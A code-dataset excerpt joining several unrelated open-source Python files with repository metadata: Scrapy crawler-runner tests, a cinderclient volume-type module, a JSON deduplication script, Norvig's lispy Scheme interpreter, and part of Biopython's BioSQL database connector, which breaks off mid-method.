class CrawlerRunnerHasSpider(unittest.TestCase):
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_successful(self):
runner = CrawlerRunner()
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, False)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_successful_for_several(self):
runner = CrawlerRunner()
yield runner.crawl(NoRequestsSpider)
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, False)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_failed(self):
runner = CrawlerRunner()
try:
yield runner.crawl(ExceptionSpider)
except ValueError:
pass
else:
self.fail('Exception should be raised from spider')
self.assertEqual(runner.bootstrap_failed, True)
@defer.inlineCallbacks
def test_crawler_runner_bootstrap_failed_for_several(self):
runner = CrawlerRunner()
try:
yield runner.crawl(ExceptionSpider)
except ValueError:
pass
else:
self.fail('Exception should be raised from spider')
yield runner.crawl(NoRequestsSpider)
self.assertEqual(runner.bootstrap_failed, True)
def test_crawler_runner_asyncio_enabled_true(self):
if self.reactor_pytest == 'asyncio':
CrawlerRunner(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
else:
msg = r"The installed reactor \(.*?\) does not match the requested one \(.*?\)"
with self.assertRaisesRegex(Exception, msg):
CrawlerRunner(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
@defer.inlineCallbacks
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_crawler_process_asyncio_enabled_true(self):
with LogCapture(level=logging.DEBUG) as log:
if self.reactor_pytest == 'asyncio':
runner = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
yield runner.crawl(NoRequestsSpider)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", str(log))
else:
msg = r"The installed reactor \(.*?\) does not match the requested one \(.*?\)"
with self.assertRaisesRegex(Exception, msg):
runner = CrawlerProcess(settings={
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
})
@defer.inlineCallbacks
def test_crawler_process_asyncio_enabled_false(self):
runner = CrawlerProcess(settings={"TWISTED_REACTOR": None})
with LogCapture(level=logging.DEBUG) as log:
yield runner.crawl(NoRequestsSpider)
self.assertNotIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", str(log))
class ScriptRunnerMixin:
def run_script(self, script_name, *script_args):
script_path = os.path.join(self.script_dir, script_name)
args = [sys.executable, script_path] + list(script_args)
p = subprocess.Popen(args, env=get_testenv(),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return stderr.decode('utf-8')
class CrawlerProcessSubprocess(ScriptRunnerMixin, unittest.TestCase):
script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'CrawlerProcess')
def test_simple(self):
log = self.run_script('simple.py')
self.assertIn('Spider closed (finished)', log)
self.assertNotIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_asyncio_enabled_no_reactor(self):
log = self.run_script('asyncio_enabled_no_reactor.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_asyncio_enabled_reactor(self):
log = self.run_script('asyncio_enabled_reactor.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
def test_ipv6_default_name_resolver(self):
log = self.run_script('default_name_resolver.py')
self.assertIn('Spider closed (finished)', log)
self.assertIn("'downloader/exception_type_count/twisted.internet.error.DNSLookupError': 1,", log)
self.assertIn(
"twisted.internet.error.DNSLookupError: DNS lookup failed: no results for hostname lookup: ::1.",
log)
def test_caching_hostname_resolver_ipv6(self):
log = self.run_script("caching_hostname_resolver_ipv6.py")
self.assertIn("Spider closed (finished)", log)
self.assertNotIn("twisted.internet.error.DNSLookupError", log)
def test_caching_hostname_resolver_finite_execution(self):
with MockServer() as mock_server:
http_address = mock_server.http_address.replace("0.0.0.0", "127.0.0.1")
log = self.run_script("caching_hostname_resolver.py", http_address)
self.assertIn("Spider closed (finished)", log)
self.assertNotIn("ERROR: Error downloading", log)
self.assertNotIn("TimeoutError", log)
self.assertNotIn("twisted.internet.error.DNSLookupError", log)
def test_reactor_select(self):
log = self.run_script("twisted_reactor_select.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.selectreactor.SelectReactor", log)
@mark.skipif(platform.system() == 'Windows', reason="PollReactor is not supported on Windows")
def test_reactor_poll(self):
log = self.run_script("twisted_reactor_poll.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.pollreactor.PollReactor", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_reactor_asyncio(self):
log = self.run_script("twisted_reactor_asyncio.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
@mark.skipif(sys.implementation.name == 'pypy', reason='uvloop does not support pypy properly')
@mark.skipif(platform.system() == 'Windows', reason='uvloop does not support Windows')
def test_custom_loop_asyncio(self):
log = self.run_script("asyncio_custom_loop.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertIn("Using asyncio event loop: uvloop.Loop", log)
@mark.skipif(sys.implementation.name == "pypy", reason="uvloop does not support pypy properly")
@mark.skipif(platform.system() == "Windows", reason="uvloop does not support Windows")
def test_custom_loop_asyncio_deferred_signal(self):
log = self.run_script("asyncio_deferred_signal.py", "uvloop.Loop")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertIn("Using asyncio event loop: uvloop.Loop", log)
self.assertIn("async pipeline opened!", log)
# https://twistedmatrix.com/trac/ticket/9766
@skipIf(platform.system() == 'Windows' and sys.version_info >= (3, 8),
"the asyncio reactor is broken on Windows when running Python ≥ 3.8")
def test_default_loop_asyncio_deferred_signal(self):
log = self.run_script("asyncio_deferred_signal.py")
self.assertIn("Spider closed (finished)", log)
self.assertIn("Using reactor: twisted.internet.asyncioreactor.AsyncioSelectorReactor", log)
self.assertNotIn("Using asyncio event loop: uvloop.Loop", log)
self.assertIn("async pipeline opened!", log)
class CrawlerRunnerSubprocess(ScriptRunnerMixin, unittest.TestCase):
script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'CrawlerRunner')
def test_response_ip_address(self):
log = self.run_script("ip_address.py")
self.assertIn("INFO: Spider closed (finished)", log)
self.assertIn("INFO: Host: not.a.real.domain", log)
self.assertIn("INFO: Type: <class 'ipaddress.IPv4Address'>", log)
self.assertIn("INFO: IP address: 127.0.0.1", log)
|
bsd-3-clause
| 6,069,620,214,822,966,000 | 40.463291 | 112 | 0.666992 | false | 4.025068 | true | false | false |
metacloud/python-cinderclient
|
cinderclient/v1/volume_types.py
|
1
|
3496
|
# Copyright (c) 2011 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volume Type interface.
"""
from cinderclient import base
class VolumeType(base.Resource):
"""
A Volume Type is the type of volume to be created
"""
def __repr__(self):
return "<VolumeType: %s>" % self.name
def get_keys(self):
"""
Get extra specs from a volume type.
:param vol_type: The :class:`VolumeType` to get extra specs from
"""
_resp, body = self.manager.api.client.get(
"/types/%s/extra_specs" %
base.getid(self))
return body["extra_specs"]
def set_keys(self, metadata):
"""
Set extra specs on a volume type.
:param type : The :class:`VolumeType` to set extra spec on
:param metadata: A dict of key/value pairs to be set
"""
body = {'extra_specs': metadata}
return self.manager._create(
"/types/%s/extra_specs" % base.getid(self),
body,
"extra_specs",
return_raw=True)
def unset_keys(self, keys):
"""
Unset extra specs on a volume type.
:param type_id: The :class:`VolumeType` to unset extra spec on
:param keys: A list of keys to be unset
"""
# NOTE(jdg): This wasn't actually doing all of the keys before
# the return in the loop resulted in ony ONE key being unset.
# since on success the return was NONE, we'll only interrupt the loop
# and return if there's an error
resp = None
for k in keys:
resp = self.manager._delete(
"/types/%s/extra_specs/%s" % (
base.getid(self), k))
if resp is not None:
return resp
class VolumeTypeManager(base.ManagerWithFind):
"""
Manage :class:`VolumeType` resources.
"""
resource_class = VolumeType
def list(self, search_opts=None):
"""
Get a list of all volume types.
:rtype: list of :class:`VolumeType`.
"""
return self._list("/types", "volume_types")
def get(self, volume_type):
"""
Get a specific volume type.
:param volume_type: The ID of the :class:`VolumeType` to get.
:rtype: :class:`VolumeType`
"""
return self._get("/types/%s" % base.getid(volume_type), "volume_type")
def delete(self, volume_type):
"""
Delete a specific volume_type.
:param volume_type: The name or ID of the :class:`VolumeType` to get.
"""
self._delete("/types/%s" % base.getid(volume_type))
def create(self, name):
"""
Create a volume type.
:param name: Descriptive name of the volume type
:rtype: :class:`VolumeType`
"""
body = {
"volume_type": {
"name": name,
}
}
return self._create("/types", body, "volume_type")
|
apache-2.0
| -7,710,020,607,655,474,000 | 27.655738 | 78 | 0.578661 | false | 4.041618 | false | false | false |
mefly2012/platform
|
test/guozibeijing/deal_repeat.py
|
1
|
1867
|
# coding=utf-8
import json
import codecs
import os
import sys
import re
if __name__ == '__main__':
fr1 = codecs.open(sys.argv[1], 'r', encoding='utf-8') # 我统计的
fr2 = codecs.open(sys.argv[2], 'r', encoding='utf-8') # 君哥统计的
dics1 = []
dics2 = []
for i in fr1:
js = json.loads(i)
js["bbd_dotime"] = js.get("bbd_dotime").replace(u'年', '-').replace(u'月', '-').replace(u'日', '')
dics1.append(js)
for i in fr2:
js = json.loads(i)
match = re.compile(u'^(\d+).(\d+).(\d+)$').match(js["bbd_dotime"])
js["bbd_dotime"] = "%4d-%2d-%2d" % (int(match.group(1)), int(match.group(2)), int(match.group(3)))
dics2.append(js)
dics1.sort(key=lambda x: x['company_name'])
dics2.sort(key=lambda x: x['company_name'])
# sorted(dics1, key=lambda x: x['company_name'])
# sorted(dics2, key=lambda x: x['company_name'])
first = True
company = ''
myout = []
current = []
dics1.append({})
for dc in dics1:
if company != dc.get('company_name', ''):
# 选出时间最大
if first:
first = False
company = dc.get('company_name', '')
current.append(dc)
continue
company = dc.get('company_name', '')
max_dc = max(current, key=lambda x: x['bbd_uptime'])
myout.append(max_dc)
current = []
current.append(dc)
pass
else:
current.append(dc)
print len(myout)
# for i in myout:
# find = False
# for j in dics2:
# if i == j:
# find = True
# if find:
# print json.dumps(i, ensure_ascii=False)
for i in myout:
if i not in dics2:
print json.dumps(i, ensure_ascii=False)
|
apache-2.0
| 2,724,095,015,985,590,300 | 25.536232 | 106 | 0.495358 | false | 3.056761 | false | false | false |
klose911/klose911.github.io
|
src/python/src/lisp/lispy.py
|
1
|
12433
|
################ Scheme Interpreter in Python
## (c) Peter Norvig, 2010; See http://norvig.com/lispy2.html
################ Symbol, Procedure, classes
from __future__ import division
from __future__ import print_function
import re, sys
from io import StringIO
class Symbol(str): pass
def Sym(s, symbol_table={}):
"Find or create unique Symbol entry for str s in symbol table."
if s not in symbol_table: symbol_table[s] = Symbol(s)
return symbol_table[s]
_quote, _if, _set, _define, _lambda, _begin, _definemacro, = map(Sym,
"quote if set! define lambda begin define-macro".split())
_quasiquote, _unquote, _unquotesplicing = map(Sym,
"quasiquote unquote unquote-splicing".split())
class Procedure(object):
"A user-defined Scheme procedure."
def __init__(self, parms, exp, env):
self.parms, self.exp, self.env = parms, exp, env
def __call__(self, *args):
return eval(self.exp, Env(self.parms, args, self.env))
################ parse, read, and user interaction
def parse(inport):
"Parse a program: read and expand/error-check it."
# Backwards compatibility: given a str, convert it to an InPort
if isinstance(inport, str): inport = InPort(StringIO(inport))
return expand(read(inport), toplevel=True)
eof_object = Symbol('#<eof-object>') # Note: uninterned; can't be read
class InPort(object):
"An input port. Retains a line of chars."
tokenizer = r"""\s*(,@|[('`,)]|"(?:[\\].|[^\\"])*"|;.*|[^\s('"`,;)]*)(.*)"""
def __init__(self, file):
self.file = file; self.line = ''
def next_token(self):
"Return the next token, reading new text into line buffer if needed."
while True:
if self.line == '': self.line = self.file.readline()
if self.line == '': return eof_object
token, self.line = re.match(InPort.tokenizer, self.line).groups()
if token != '' and not token.startswith(';'):
return token
def readchar(inport):
"Read the next character from an input port."
if inport.line != '':
ch, inport.line = inport.line[0], inport.line[1:]
return ch
else:
return inport.file.read(1) or eof_object
def read(inport):
"Read a Scheme expression from an input port."
def read_ahead(token):
if '(' == token:
L = []
while True:
token = inport.next_token()
if token == ')': return L
else: L.append(read_ahead(token))
elif ')' == token: raise SyntaxError('unexpected )')
elif token in quotes: return [quotes[token], read(inport)]
elif token is eof_object: raise SyntaxError('unexpected EOF in list')
else: return atom(token)
# body of read:
token1 = inport.next_token()
return eof_object if token1 is eof_object else read_ahead(token1)
quotes = {"'":_quote, "`":_quasiquote, ",":_unquote, ",@":_unquotesplicing}
def atom(token):
'Numbers become numbers; #t and #f are booleans; "..." string; otherwise Symbol.'
if token == '#t': return True
elif token == '#f': return False
elif token[0] == '"': return token[1:-1].decode('string_escape')
try: return int(token)
except ValueError:
try: return float(token)
except ValueError:
try: return complex(token.replace('i', 'j', 1))
except ValueError:
return Sym(token)
def to_string(x):
"Convert a Python object back into a Lisp-readable string."
if x is True: return "#t"
elif x is False: return "#f"
elif isa(x, Symbol): return x
elif isa(x, str): return '"%s"' % x.encode('string_escape').replace('"',r'\"')
elif isa(x, list): return '('+' '.join(map(to_string, x))+')'
elif isa(x, complex): return str(x).replace('j', 'i')
else: return str(x)
def load(filename):
"Eval every expression from a file."
repl(None, InPort(open(filename)), None)
def repl(prompt='lispy> ', inport=InPort(sys.stdin), out=sys.stdout):
"A prompt-read-eval-print loop."
sys.stderr.write("Lispy version 2.0\n")
while True:
try:
if prompt: sys.stderr.write(prompt)
x = parse(inport)
if x is eof_object: return
val = eval(x)
if val is not None and out: print(to_string(val), file=out)
except Exception as e:
print('%s: %s' % (type(e).__name__, e))
################ Environment class
class Env(dict):
"An environment: a dict of {'var':val} pairs, with an outer Env."
def __init__(self, parms=(), args=(), outer=None):
# Bind parm list to corresponding args, or single parm to list of args
self.outer = outer
if isa(parms, Symbol):
self.update({parms:list(args)})
else:
if len(args) != len(parms):
raise TypeError('expected %s, given %s, '
% (to_string(parms), to_string(args)))
self.update(zip(parms,args))
def find(self, var):
"Find the innermost Env where var appears."
if var in self: return self
elif self.outer is None: raise LookupError(var)
else: return self.outer.find(var)
def is_pair(x): return x != [] and isa(x, list)
def cons(x, y): return [x]+y
def callcc(proc):
"Call proc with current continuation; escape only"
ball = RuntimeWarning("Sorry, can't continue this continuation any longer.")
def throw(retval): ball.retval = retval; raise ball
try:
return proc(throw)
except RuntimeWarning as w:
if w is ball: return ball.retval
else: raise w
def add_globals(self):
"Add some Scheme standard procedures."
import math, cmath, operator as op
self.update(vars(math))
self.update(vars(cmath))
self.update({
'+':op.add, '-':op.sub, '*':op.mul, '/':op.truediv, 'not':op.not_,
'>':op.gt, '<':op.lt, '>=':op.ge, '<=':op.le, '=':op.eq,
'equal?':op.eq, 'eq?':op.is_, 'length':len, 'cons':cons,
'car':lambda x:x[0], 'cdr':lambda x:x[1:], 'append':op.add,
'list':lambda *x:list(x), 'list?': lambda x:isa(x,list),
'null?':lambda x:x==[], 'symbol?':lambda x: isa(x, Symbol),
'boolean?':lambda x: isa(x, bool), 'pair?':is_pair,
'port?': lambda x:isa(x,file), 'apply':lambda proc,l: proc(*l),
'eval':lambda x: eval(expand(x)), 'load':lambda fn: load(fn), 'call/cc':callcc,
'open-input-file':open,'close-input-port':lambda p: p.file.close(),
'open-output-file':lambda f:open(f,'w'), 'close-output-port':lambda p: p.close(),
'eof-object?':lambda x:x is eof_object, 'read-char':readchar,
'read':read, 'write':lambda x,port=sys.stdout:port.write(to_string(x)),
'display':lambda x,port=sys.stdout:port.write(x if isa(x,str) else to_string(x))})
return self
isa = isinstance
global_env = add_globals(Env())
################ eval (tail recursive)
def eval(x, env=global_env):
"Evaluate an expression in an environment."
while True:
if isa(x, Symbol): # variable reference
return env.find(x)[x]
elif not isa(x, list): # constant literal
return x
elif x[0] is _quote: # (quote exp)
(_, exp) = x
return exp
elif x[0] is _if: # (if test conseq alt)
(_, test, conseq, alt) = x
x = (conseq if eval(test, env) else alt)
elif x[0] is _set: # (set! var exp)
(_, var, exp) = x
env.find(var)[var] = eval(exp, env)
return None
elif x[0] is _define: # (define var exp)
(_, var, exp) = x
env[var] = eval(exp, env)
return None
elif x[0] is _lambda: # (lambda (var*) exp)
(_, vars, exp) = x
return Procedure(vars, exp, env)
elif x[0] is _begin: # (begin exp+)
for exp in x[1:-1]:
eval(exp, env)
x = x[-1]
else: # (proc exp*)
exps = [eval(exp, env) for exp in x]
proc = exps.pop(0)
if isa(proc, Procedure):
x = proc.exp
env = Env(proc.parms, exps, proc.env)
else:
return proc(*exps)
################ expand
def expand(x, toplevel=False):
"Walk tree of x, making optimizations/fixes, and signaling SyntaxError."
require(x, x!=[]) # () => Error
if not isa(x, list): # constant => unchanged
return x
elif x[0] is _quote: # (quote exp)
require(x, len(x)==2)
return x
elif x[0] is _if:
if len(x)==3: x = x + [None] # (if t c) => (if t c None)
require(x, len(x)==4)
return map(expand, x)
elif x[0] is _set:
require(x, len(x)==3);
var = x[1] # (set! non-var exp) => Error
require(x, isa(var, Symbol), "can set! only a symbol")
return [_set, var, expand(x[2])]
elif x[0] is _define or x[0] is _definemacro:
require(x, len(x)>=3)
_def, v, body = x[0], x[1], x[2:]
if isa(v, list) and v: # (define (f args) body)
f, args = v[0], v[1:] # => (define f (lambda (args) body))
return expand([_def, f, [_lambda, args]+body])
else:
require(x, len(x)==3) # (define non-var/list exp) => Error
require(x, isa(v, Symbol), "can define only a symbol")
exp = expand(x[2])
if _def is _definemacro:
require(x, toplevel, "define-macro only allowed at top level")
proc = eval(exp)
require(x, callable(proc), "macro must be a procedure")
macro_table[v] = proc # (define-macro v proc)
return None # => None; add v:proc to macro_table
return [_define, v, exp]
elif x[0] is _begin:
if len(x)==1: return None # (begin) => None
else: return [expand(xi, toplevel) for xi in x]
elif x[0] is _lambda: # (lambda (x) e1 e2)
require(x, len(x)>=3) # => (lambda (x) (begin e1 e2))
vars, body = x[1], x[2:]
require(x, (isa(vars, list) and all(isa(v, Symbol) for v in vars))
or isa(vars, Symbol), "illegal lambda argument list")
exp = body[0] if len(body) == 1 else [_begin] + body
return [_lambda, vars, expand(exp)]
elif x[0] is _quasiquote: # `x => expand_quasiquote(x)
require(x, len(x)==2)
return expand_quasiquote(x[1])
elif isa(x[0], Symbol) and x[0] in macro_table:
return expand(macro_table[x[0]](*x[1:]), toplevel) # (m arg...)
else: # => macroexpand if m isa macro
return map(expand, x) # (f arg...) => expand each
def require(x, predicate, msg="wrong length"):
"Signal a syntax error if predicate is false."
if not predicate: raise SyntaxError(to_string(x)+': '+msg)
_append, _cons, _let = map(Sym, "append cons let".split())
def expand_quasiquote(x):
"""Expand `x => 'x; `,x => x; `(,@x y) => (append x y) """
if not is_pair(x):
return [_quote, x]
require(x, x[0] is not _unquotesplicing, "can't splice here")
if x[0] is _unquote:
require(x, len(x)==2)
return x[1]
elif is_pair(x[0]) and x[0][0] is _unquotesplicing:
require(x[0], len(x[0])==2)
return [_append, x[0][1], expand_quasiquote(x[1:])]
else:
return [_cons, expand_quasiquote(x[0]), expand_quasiquote(x[1:])]
def let(*args):
args = list(args)
x = cons(_let, args)
require(x, len(args)>1)
bindings, body = args[0], args[1:]
require(x, all(isa(b, list) and len(b)==2 and isa(b[0], Symbol)
for b in bindings), "illegal binding list")
vars, vals = zip(*bindings)
return [[_lambda, list(vars)]+map(expand, body)] + map(expand, vals)
macro_table = {_let:let} ## More macros can go here
eval(parse("""(begin
(define-macro and (lambda args
(if (null? args) #t
(if (= (length args) 1) (car args)
`(if ,(car args) (and ,@(cdr args)) #f)))))
;; More macros can also go here
)"""))
if __name__ == '__main__':
repl()
|
apache-2.0
| 21,476,832,186,802,524 | 37.974922 | 87 | 0.541945 | false | 3.343103 | false | false | false |
poojavade/Genomics_Docker
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/BioSQL/BioSeqDatabase.py
|
1
|
30416
|
# Copyright 2002 by Andrew Dalke. All rights reserved.
# Revisions 2007-2014 copyright by Peter Cock. All rights reserved.
# Revisions 2009 copyright by Cymon J. Cox. All rights reserved.
# Revisions 2013-2014 copyright by Tiago Antao. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
# Note that BioSQL (including the database schema and scripts) is
# available and licensed separately. Please consult www.biosql.org
"""Connect with a BioSQL database and load Biopython like objects from it.
This provides interfaces for loading biological objects from a relational
database, and is compatible with the BioSQL standards.
"""
import os
import sys
from Bio._py3k import _universal_read_mode
from Bio._py3k import _bytes_bytearray_to_str as bytearray_to_str
from Bio import BiopythonDeprecationWarning
from . import BioSeq
from . import Loader
from . import DBUtils
_POSTGRES_RULES_PRESENT = False # Hack for BioSQL Bug 2839
def open_database(driver="MySQLdb", **kwargs):
"""Main interface for loading a existing BioSQL-style database.
This function is the easiest way to retrieve a connection to a
database, doing something like:
>>> from BioSeq import BioSeqDatabase
>>> server = BioSeqDatabase.open_database(user="root", db="minidb")
Arguments:
- driver - The name of the database driver to use for connecting. The
driver should implement the python DB API. By default, the MySQLdb
driver is used.
- user -the username to connect to the database with.
- password, passwd - the password to connect with
- host - the hostname of the database
- database or db - the name of the database
"""
if driver == "psycopg":
raise ValueError("Using BioSQL with psycopg (version one) is no "
"longer supported. Use psycopg2 instead.")
if os.name == "java":
from com.ziclix.python.sql import zxJDBC
module = zxJDBC
if driver in ["MySQLdb"]:
jdbc_driver = "com.mysql.jdbc.Driver"
url_pref = "jdbc:mysql://" + kwargs["host"] + "/"
elif driver in ["psycopg2"]:
jdbc_driver = "org.postgresql.Driver"
url_pref = "jdbc:postgresql://" + kwargs["host"] + "/"
else:
module = __import__(driver, fromlist=["connect"])
connect = module.connect
# Different drivers use different keywords...
kw = kwargs.copy()
if driver in ["MySQLdb", "mysql.connector"] and os.name != "java":
if "database" in kw:
kw["db"] = kw["database"]
del kw["database"]
if "password" in kw:
kw["passwd"] = kw["password"]
del kw["password"]
# kw["charset"] = "utf8"
# kw["use_unicode"] = True
else:
# DB-API recommendations
if "db" in kw:
kw["database"] = kw["db"]
del kw["db"]
if "passwd" in kw:
kw["password"] = kw["passwd"]
del kw["passwd"]
if driver in ["psycopg2", "pgdb"] and not kw.get("database"):
kw["database"] = "template1"
# SQLite connect takes the database name as input
if os.name == "java":
if driver in ["MySQLdb"]:
conn = connect(url_pref + kw.get("database", "mysql"),
kw["user"], kw["password"], jdbc_driver)
elif driver in ["psycopg2"]:
conn = connect(url_pref + kw.get("database", "postgresql") +
"?stringtype=unspecified",
kw["user"], kw["password"], jdbc_driver)
elif driver in ["sqlite3"]:
conn = connect(kw["database"])
else:
conn = connect(**kw)
if os.name == "java":
server = DBServer(conn, module, driver)
else:
server = DBServer(conn, module)
# TODO - Remove the following once BioSQL Bug 2839 is fixed.
# Test for RULES in PostgreSQL schema, see also Bug 2833.
if driver in ["psycopg2", "pgdb"]:
sql = "SELECT ev_class FROM pg_rewrite WHERE " + \
"rulename='rule_bioentry_i1' OR " + \
"rulename='rule_bioentry_i2';"
if server.adaptor.execute_and_fetchall(sql):
import warnings
from Bio import BiopythonWarning
warnings.warn("Your BioSQL PostgreSQL schema includes some "
"rules currently required for bioperl-db but "
"which may cause problems loading data using "
"Biopython (see BioSQL Bug 2839). If you do not "
"use BioPerl, please remove these rules. "
"Biopython should cope with the rules present, "
"but with a performance penalty when loading "
"new records.", BiopythonWarning)
global _POSTGRES_RULES_PRESENT
_POSTGRES_RULES_PRESENT = True
return server
class DBServer(object):
"""Represents a BioSQL database continaing namespaces (sub-databases).
This acts like a Python dictionary, giving access to each namespace
(defined by a row in the biodatabase table) as a BioSeqDatabase object.
"""
def __init__(self, conn, module, module_name=None):
self.module = module
if module_name is None:
module_name = module.__name__
if module_name == "mysql.connector" and sys.version_info[0] == 3:
wrap_cursor = True
else:
wrap_cursor = False
# Get module specific Adaptor or the base (general) Adaptor
Adapt = _interface_specific_adaptors.get(module_name, Adaptor)
self.adaptor = Adapt(conn, DBUtils.get_dbutils(module_name),
wrap_cursor=wrap_cursor)
self.module_name = module_name
def __repr__(self):
return self.__class__.__name__ + "(%r)" % self.adaptor.conn
def __getitem__(self, name):
return BioSeqDatabase(self.adaptor, name)
def __len__(self):
"""Number of namespaces (sub-databases) in this database."""
sql = "SELECT COUNT(name) FROM biodatabase;"
return int(self.adaptor.execute_and_fetch_col0(sql)[0])
def __contains__(self, value):
"""Check if a namespace (sub-database) in this database."""
sql = "SELECT COUNT(name) FROM biodatabase WHERE name=%s;"
return bool(self.adaptor.execute_and_fetch_col0(sql, (value,))[0])
def __iter__(self):
"""Iterate over namespaces (sub-databases) in the database."""
# TODO - Iterate over the cursor, much more efficient
return iter(self.adaptor.list_biodatabase_names())
if hasattr(dict, "iteritems"):
# Python 2, use iteritems etc
def keys(self):
"""List of namespaces (sub-databases) in the database."""
return self.adaptor.list_biodatabase_names()
def values(self):
"""List of BioSeqDatabase objects in the database."""
return [self[key] for key in self]
def items(self):
"""List of (namespace, BioSeqDatabase) for entries in the database."""
return [(key, self[key]) for key in self]
def iterkeys(self):
"""Iterate over namespaces (sub-databases) in the database."""
return iter(self)
def itervalues(self):
"""Iterate over BioSeqDatabase objects in the database."""
for key in self:
yield self[key]
def iteritems(self):
"""Iterate over (namespace, BioSeqDatabase) in the database."""
for key in self:
yield key, self[key]
else:
# Python 3, items etc are all iterators
def keys(self):
"""Iterate over namespaces (sub-databases) in the database."""
return iter(self)
def values(self):
"""Iterate over BioSeqDatabase objects in the database."""
for key in self:
yield self[key]
def items(self):
"""Iterate over (namespace, BioSeqDatabase) in the database."""
for key in self:
yield key, self[key]
def __delitem__(self, name):
"""Remove a namespace and all its entries."""
if name not in self:
raise KeyError(name)
db_id = self.adaptor.fetch_dbid_by_dbname(name)
remover = Loader.DatabaseRemover(self.adaptor, db_id)
remover.remove()
def remove_database(self, db_name):
"""Remove a namespace and all its entries (OBSOLETE).
Try to remove all references to items in a database.
server.remove_database(name)
In keeping with the dictionary interface, you can now do this:
del server[name]
"""
import warnings
warnings.warn("This method is deprecated. In keeping with the "
"dictionary interface, you can now use 'del "
"server[name]' instead", BiopythonDeprecationWarning)
self.__delitem__(db_name)
def new_database(self, db_name, authority=None, description=None):
"""Add a new database to the server and return it.
"""
# make the database
sql = r"INSERT INTO biodatabase (name, authority, description)" \
r" VALUES (%s, %s, %s)"
self.adaptor.execute(sql, (db_name, authority, description))
return BioSeqDatabase(self.adaptor, db_name)
def load_database_sql(self, sql_file):
"""Load a database schema into the given database.
This is used to create tables, etc when a database is first created.
sql_file should specify the complete path to a file containing
SQL entries for building the tables.
"""
# Not sophisticated enough for PG schema. Is it needed by MySQL?
# Looks like we need this more complicated way for both. Leaving it
# the default and removing the simple-minded approach.
# read the file with all comment lines removed
sql = ""
with open(sql_file, _universal_read_mode) as sql_handle:
for line in sql_handle:
if line.startswith("--"): # don't include comment lines
pass
elif line.startswith("#"): # ditto for MySQL comments
pass
elif line.strip(): # only include non-blank lines
sql += line.strip() + " "
# two ways to load the SQL
# 1. PostgreSQL can load it all at once and actually needs to
# due to FUNCTION defines at the end of the SQL which mess up
# the splitting by semicolons
if self.module_name in ["psycopg2", "pgdb"]:
self.adaptor.cursor.execute(sql)
# 2. MySQL needs the database loading split up into single lines of
# SQL executed one at a time
elif self.module_name in ["mysql.connector", "MySQLdb", "sqlite3"]:
sql_parts = sql.split(";") # one line per sql command
# don't use the last item, it's blank
for sql_line in sql_parts[:-1]:
self.adaptor.cursor.execute(sql_line)
else:
raise ValueError("Module %s not supported by the loader." %
(self.module_name))
def commit(self):
"""Commits the current transaction to the database."""
return self.adaptor.commit()
def rollback(self):
"""Rolls backs the current transaction."""
return self.adaptor.rollback()
def close(self):
"""Close the connection. No further activity possible."""
return self.adaptor.close()
class _CursorWrapper(object):
"""A wraper for mysql.connector resolving bytestring representations."""
def __init__(self, real_cursor):
self.real_cursor = real_cursor
def execute(self, operation, params=None, multi=False):
self.real_cursor.execute(operation, params, multi)
def _convert_tuple(self, tuple_):
tuple_list = list(tuple_)
for i, elem in enumerate(tuple_list):
if type(elem) is bytes:
tuple_list[i] = elem.decode("utf-8")
return tuple(tuple_list)
def _convert_list(self, lst):
ret_lst = []
for tuple_ in lst:
new_tuple = self._convert_tuple(tuple_)
ret_lst.append(new_tuple)
return ret_lst
def fetchall(self):
rv = self.real_cursor.fetchall()
